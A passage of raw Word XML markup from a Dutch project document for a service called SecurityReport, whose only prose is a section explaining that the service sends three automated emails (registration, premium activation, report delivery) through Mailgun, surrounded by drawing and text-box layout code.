                <wp:docPr id="665" name="Rectangle 66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02936" id="Rectangle 665" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.8pt;margin-top:-70.85pt;width:25pt;height:1031.7pt;z-index:-25052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SbL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7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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B64191">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pagina 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E6069" w14:textId="4091DEC5" w:rsidR="00E12294" w:rsidRDefault="00E12294">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E5F62D" w14:textId="5DE524AA" w:rsidR="00E12294" w:rsidRDefault="00E12294">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="112690B2" w14:textId="77777777" w:rsidR="009D7F48" w:rsidRDefault="009D7F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D022B25" w14:textId="77777777" w:rsidR="009D7F48" w:rsidRDefault="009D7F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273DEE54" w14:textId="77777777" w:rsidR="009D7F48" w:rsidRDefault="009D7F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DECD5B9" w14:textId="77777777" w:rsidR="009D7F48" w:rsidRDefault="009D7F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51CFDF71" w14:textId="77777777" w:rsidR="009D7F48" w:rsidRDefault="009D7F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBBC599" w14:textId="77777777" w:rsidR="009D7F48" w:rsidRDefault="009D7F48">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:sectPr w:rsidR="009D7F48" w:rsidSect="00446588">
          <w:headerReference w:type="default" r:id="rId76"/>
          <w:headerReference w:type="first" r:id="rId77"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31808F62" w14:textId="77777777" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="00013211">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C09655D" w14:textId="77777777" w:rsidR="00512B06" w:rsidRDefault="00512B06" w:rsidP="00013211">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB9211D" w14:textId="77777777" w:rsidR="00E12294" w:rsidRPr="006F480C" w:rsidRDefault="00365A3C" w:rsidP="00013211">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252872704" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1526213D" wp14:editId="4F18ECB7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-914861</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1031188</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="520" name="Rectangle 52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4A335" id="Rectangle 520" o:spid="_x0000_s1026" style="position:absolute;margin-left:-72.05pt;margin-top:-81.15pt;width:25pt;height:1031.7pt;z-index:-2504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SjC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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0089121A">
        <w:t>4.5</w:t>
      </w:r>
      <w:r w:rsidR="00E12294">
        <w:t>.5 E-Mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A9EC0" w14:textId="77777777" w:rsidR="00E12294" w:rsidRDefault="00E12294" w:rsidP="00E12294">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353E3B32" w14:textId="759CF44A" w:rsidR="00205BD3" w:rsidRDefault="00CA77E2" w:rsidP="0065002E">
      <w:r>
        <w:t>Voor het e</w:t>
      </w:r>
      <w:r w:rsidR="009F60C4">
        <w:t xml:space="preserve">-mailen van alle servicemails gebruikt SecurityReport Mailgun. Met Mailgun </w:t>
      </w:r>
      <w:r w:rsidR="0055637F">
        <w:t>kunnen de servicemails</w:t>
      </w:r>
      <w:r w:rsidR="00241BD1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001125C3">
        <w:t>geautomatiseerd worden. SecurityReport verstuurd in een heel scan proces 3 e-mails.</w:t>
      </w:r>
      <w:r w:rsidR="00A17C86">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4530"/>
        <w:gridCol w:w="4530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00205BD3" w14:paraId="3379311A" w14:textId="77777777" w:rsidTr="00F1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700861" w14:textId="4B5D8A90" w:rsidR="00205BD3" w:rsidRDefault="00205BD3" w:rsidP="0065002E">
            <w:r>
              <w:t>Soort servicemail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21FE4A68" w14:textId="5AEACDA8" w:rsidR="00205BD3" w:rsidRDefault="00205BD3" w:rsidP="0065002E">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00205BD3" w14:paraId="373FA2CC"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CA63AF" w14:textId="044210D7" w:rsidR="00205BD3" w:rsidRDefault="00205BD3" w:rsidP="0065002E">
            <w:r>
              <w:t>Registratie e-mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A5EF090" w14:textId="758CCA6A"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succesvol registreren van een klant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00205BD3" w14:paraId="189A36F0" w14:textId="77777777" w:rsidTr="00F10C36">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F5547D3" w14:textId="4CA49387" w:rsidR="00205BD3" w:rsidRDefault="00205BD3" w:rsidP="0065002E">
            <w:r>
              <w:t>Premium e-mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B129B8" w14:textId="60BC77AF" w:rsidR="00205BD3" w:rsidRDefault="00205BD3" w:rsidP="0065002E">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Na het activeren van een Premiumaccount</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00205BD3" w14:paraId="4ED2B3A1"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A466A" w14:textId="39486604" w:rsidR="00205BD3" w:rsidRDefault="00205BD3" w:rsidP="0065002E">
            <w:r>
              <w:t>Rapport e-mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29AC3750" w14:textId="297E8172"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genereren van het rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BD84938" w14:textId="230629AD" w:rsidR="00E31446" w:rsidRDefault="00722D69" w:rsidP="0065002E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252876800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5A5372C6" wp14:editId="0E1F73FB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1002030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>246380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4936490" cy="1506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ling service.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4936490" cy="1506220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00426B8E">
        <w:t>Tabel 4.23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F5298D" w14:textId="07D3AE1D" w:rsidR="00672F72" w:rsidRDefault="00722D69" w:rsidP="0065002E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252875776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="433F777F" wp14:editId="39C8492D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-137160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>286385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="914400"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="576" y="0"/>
                    <wp:lineTo x="0" y="1800"/>
                    <wp:lineTo x="0" y="20400"/>
                    <wp:lineTo x="576" y="21600"/>
                    <wp:lineTo x="21312" y="21600"/>
                    <wp:lineTo x="21888" y="20400"/>
                    <wp:lineTo x="21888" y="1800"/>
                    <wp:lineTo x="21312" y="0"/>
                    <wp:lineTo x="576" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="20" name="Rounded Rectangle 20"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="952500" cy="9144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2E222" id="Rounded Rectangle 20" o:spid="_x0000_s1026" style="position:absolute;margin-left:-10.8pt;margin-top:22.55pt;width:75pt;height:1in;z-index:25287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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
                <w10:wrap type="through"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="21159CAD" w14:textId="015B688E" w:rsidR="00B66B91" w:rsidRDefault="00722D69" w:rsidP="0065002E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252874752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28D4AB4C" wp14:editId="42F0CA20">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>57785</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>205740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="546100" cy="538480"/>
            <wp:effectExtent l="0" t="0" r="1270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79">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p w14:paraId="3E799F19" w14:textId="5AD96656" w:rsidR="00426B8E" w:rsidRDefault="00426B8E" w:rsidP="0065002E">
      <w:r>
        <w:t>Figuur 4.23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6094C1C4" w14:textId="77777777" w:rsidR="00B66B91" w:rsidRDefault="00B66B91" w:rsidP="0065002E">
      <w:r>
        <w:t>Modulaire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435641A9" w14:textId="0EAA86CC" w:rsidR="00D55E15" w:rsidRDefault="00E9328E" w:rsidP="003679C4">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678702" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D649FFA" wp14:editId="3B41F8EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>714375</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5464810" cy="3514090"/>
                <wp:effectExtent l="0" t="0" r="21590" b="16510"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21545"/>
                    <wp:lineTo x="21585" y="21545"/>
                    <wp:lineTo x="2158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464810" cy="351409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949EB" id="Rectangle 3" o:spid="_x0000_s1026" style="position:absolute;margin-left:-.85pt;margin-top:56.25pt;width:430.3pt;height:276.7pt;z-index:251678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" fillcolor="#ffd966" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679727" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F3DDF8E" wp14:editId="6DB54C61">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2469515</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>952500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2032000" cy="3161665"/>
                <wp:effectExtent l="0" t="0" r="25400" b="13335"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21518"/>
                    <wp:lineTo x="21600" y="21518"/>
                    <wp:lineTo x="21600" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="617" name="Rectangle 617"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2032000" cy="3161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88304" id="Rectangle 617" o:spid="_x0000_s1026" style="position:absolute;margin-left:194.45pt;margin-top:75pt;width:160pt;height:248.95pt;z-index:251679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" filled="f" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F27CCD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252906496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55A858D1" wp14:editId="7717A207">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3225800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1758950</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="505460" cy="223520"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="132" name="Text Box 132"/>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66807" w14:textId="19C29DCB" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5"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858D1" id="Text Box 132" o:spid="_x0000_s1184" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:254pt;margin-top:138.5pt;width:39.8pt;height:17.6pt;z-index:25290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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="35366807" w14:textId="19C29DCB" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5"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0352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F67E065" wp14:editId="60AFCC98">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3096260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1524000</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="629" name="Text Box 629"/>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09511" w14:textId="5E9995A3" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Registr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7E065" id="Text Box 629" o:spid="_x0000_s1185" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:243.8pt;margin-top:120pt;width:65pt;height:18pt;z-index:2529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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5C509511" w14:textId="5E9995A3" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Registratie</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10592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45A31F9B" wp14:editId="66A11C6F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3225800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3354705</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="505460" cy="223520"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="184" name="Text Box 184"/>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A2D54" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5"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1F9B" id="Text Box 184" o:spid="_x0000_s1186" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:254pt;margin-top:264.15pt;width:39.8pt;height:17.6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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="69BA2D54" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5"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8544" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11353E8B" wp14:editId="5348CC58">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3223895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2556510</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="505460" cy="223520"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="147" name="Text Box 147"/>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20DDD7" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5"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53E8B" id="Text Box 147" o:spid="_x0000_s1187" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:253.85pt;margin-top:201.3pt;width:39.8pt;height:17.6pt;z-index:25290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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0420DDD7" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5"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4448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F1AADFC" wp14:editId="2AD41FBD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3164205</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3126105</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="637540" cy="220980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="638" name="Text Box 638"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="637540"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031C4" w14:textId="5E3DEB9C" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5" w:rsidP="00556CF7">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>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ADFC" id="Text Box 638" o:spid="_x0000_s1188" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:249.15pt;margin-top:246.15pt;width:50.2pt;height:17.4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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4CD031C4" w14:textId="5E3DEB9C" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5" w:rsidP="00556CF7">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Rapport</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2400" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="78A30E29" wp14:editId="2F35D36A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3103245</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2330450</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="637" name="Text Box 637"/>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5B621" w14:textId="10CABD63" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5" w:rsidP="00556CF7">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>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30E29" id="Text Box 637" o:spid="_x0000_s1189" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:244.35pt;margin-top:183.5pt;width:65pt;height:18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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5195B621" w14:textId="10CABD63" w:rsidR="002A05E5" w:rsidRPr="00556CF7" w:rsidRDefault="002A05E5" w:rsidP="00556CF7">
                      <w:pPr>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Premium</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99328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C344C37" wp14:editId="7BFD398E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1831340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2898140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1077973" cy="455822"/>
                <wp:effectExtent l="0" t="0" r="40005" b="27305"/>
                <wp:wrapNone/>
                <wp:docPr id="626" name="Straight Connector 626"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1077973" cy="455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A70F0" id="Straight Connector 626" o:spid="_x0000_s1026" style="position:absolute;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28.2pt" to="229.1pt,26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7280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F104130" wp14:editId="3C9602A2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1831340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2552389</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1079095" cy="2851"/>
                <wp:effectExtent l="0" t="0" r="38735" b="48260"/>
                <wp:wrapNone/>
                <wp:docPr id="625" name="Straight Connector 625"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
